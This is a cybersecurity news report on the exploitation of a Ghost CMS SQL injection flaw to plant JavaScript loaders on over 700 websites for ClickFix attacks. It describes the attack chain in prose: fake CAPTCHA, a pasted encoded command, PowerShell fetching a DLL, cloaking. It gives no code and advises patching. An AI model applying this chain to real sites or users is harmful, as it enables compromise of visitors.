Ghost CMS CVE-2026-26980 Exploited to Compromise Over 700 Websites in ClickFix Campaign
A critical security vulnerability in Ghost CMS has been exploited by threat actors to inject malicious JavaScript code, facilitating ClickFix attacks. This exploitation of CVE-2026-26980, which has a CVSS score of 9.4, underscores a significant risk for users of the platform.
Overview of the Vulnerability
CVE-2026-26980 is an SQL injection vulnerability within Ghost’s Content API that allows unauthenticated attackers to read arbitrary data from the database. Discovered by Anthropic using Claude, this flaw was addressed in February 2026 with the release of version 6.19.1. However, the window of opportunity for attackers has proven to be substantial, as evidenced by the ongoing exploitation.
The severity of this vulnerability lies in its ability to grant unauthorized access to a site’s admin API key. This access allows attackers to manipulate content within the CMS, including the injection of malicious code into published articles.
Scale of the Attack
According to QiAnXin XLab, the exploitation of this vulnerability has led to a large-scale poisoning campaign, affecting over 700 websites across various sectors, including universities, blockchain, artificial intelligence, and financial technology. The campaign was first detected on May 7, 2026, and is attributed to at least two distinct threat clusters. The rapid deployment of malicious code within a single day highlights the efficiency and coordination of these attackers.
The injected JavaScript code acts as a two-stage loader, retrieving the main payload from an external domain. This flexibility allows attackers to change the payloads while maintaining the loader’s functionality across multiple compromised sites.
Technical Mechanisms of the Attack
The malicious JavaScript code is designed to collect fingerprint information from users’ browsers and upload it to a remote server. This traffic distribution script is powered by Adspect, a commercial cloaking service that ensures only genuine victims are served the actual payload. Security scanners and crawlers are redirected to benign web pages, effectively masking the attack.
Victims are presented with a fake CAPTCHA verification page, which is part of the ClickFix attack strategy. This page instructs users to copy and paste a Base64-encoded command into the Windows Run dialog, triggering further malicious activities.
The command serves as a dropper, delivering a ZIP archive that contains a Windows batch script. This script executes a PowerShell command to download a DLL file from a remote domain, which is then launched using “rundll32.exe.” This diversion is designed to distract users while the attack unfolds.
Implications for Users and Organizations
The implications of this vulnerability extend beyond immediate technical concerns. The compromise of legitimate websites increases the likelihood of successful ClickFix attacks, as users may trust these sites. Organizations using Ghost CMS are urged to take immediate action by upgrading to the latest version, rotating all credentials, and auditing access logs for any signs of suspicious activity.
Additionally, users who may have visited compromised sites should be notified of potential risks. The ongoing nature of the attacks emphasizes the need for vigilance and proactive security measures.
Conclusion
The exploitation of CVE-2026-26980 serves as a stark reminder of the vulnerabilities present in widely used content management systems. As threat actors continue to adapt and refine their techniques, organizations must remain vigilant and prioritize security to safeguard their digital assets.
For further details on this ongoing situation, refer to the original reporting source: thehackernews.com.
Keep reading for the latest cybersecurity developments, threat intelligence and breaking updates from across the Middle East.
